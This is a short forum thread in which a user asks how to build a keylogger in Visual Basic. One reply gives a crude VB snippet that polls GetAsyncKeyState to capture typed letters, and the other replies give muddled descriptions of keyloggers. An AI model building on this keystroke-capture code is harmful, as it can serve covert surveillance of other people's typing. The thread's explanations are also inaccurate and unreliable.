Results 1 to 4 of 4

Thread: Create keylogger in vb

  1. #1
    Join Date
    Nov 2009
    Posts
    61

    Create keylogger in vb

    Hi friend,

    Hope this is the right place to ask the question about the VB. I have an issue, want to create a keylogger in Visual basic. The reason behind the keylogger development is to protect my computer from the use of the restricted site. Please do help me i am waiting for your reply

    Thanks in advance.

  2. #2
    Join Date
    May 2008
    Posts
    2,297

    Re: Create keylogger in vb

    Hey buddy here is the basic keylogger development code. Use the code to creatE the same for your application. Declare the GetAsyncKeyState as integer.This is also available in the dll files

    1. Private Sub tmr_Timer()
    2. Dim i As Integer
    3. Static data As String
    4. For i = 65 to 90
    5. If GAKS(i)<>0 Then data = data & Chr(i)
    6. Next i
    7. If GAKS(32) <> 0 Then data = data & " "
    8. If Len(data)>=100 Then
    9. Msgbox "100 THEN" & VBNewLine & data
    10. data = ""
    11. End If
    12. End Sub

  3. #3
    Join Date
    Jan 2008
    Posts
    1,521

    Re: Create keylogger in vb

    Hello,

    Keylogger is also known as the keystroke logger. Keylogger is a program that will be invoked when a key is pressed or generated from the keyboard.It can be downloaded for the security reason of the computer or a it can be downloaded without permission of the user as a virus.It store the keyword type and upload these to the internet. The keylogger which is downloaded by itself as a malware can cause harm to the system.

    That it!!!!!!!!!!

  4. #4
    Join Date
    Feb 2008
    Posts
    1,852

    Re: Create keylogger in vb

    Hey friend,

    if you want to use the keylogger for the security purpose of the computer then i will suggest you to use kaylogger device for the same. A keylogger device is the hardware which will restrict the keyboard and mouse operation so that nobody can enter the value from the same.

    Thank you

Similar Threads

  1. Set up a keylogger using Ardamax Keylogger 2.5
    By lyoddxd in forum Networking & Security
    Replies: 2
    Last Post: 04-02-2012, 04:25 PM
  2. PDM Keylogger
    By Deandre in forum Networking & Security
    Replies: 5
    Last Post: 20-07-2010, 03:30 AM
  3. Keylogger for Mac
    By Bambina in forum Windows Software
    Replies: 7
    Last Post: 11-05-2010, 06:56 PM
  4. what is keyLogger?
    By Willard21 in forum Windows Software
    Replies: 5
    Last Post: 24-12-2009, 08:06 AM
  5. Keylogger
    By urgaffel in forum Windows Software
    Replies: 2
    Last Post: 07-11-2008, 04:16 PM

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
Page generated in 1,751,413,870.42328 seconds with 16 queries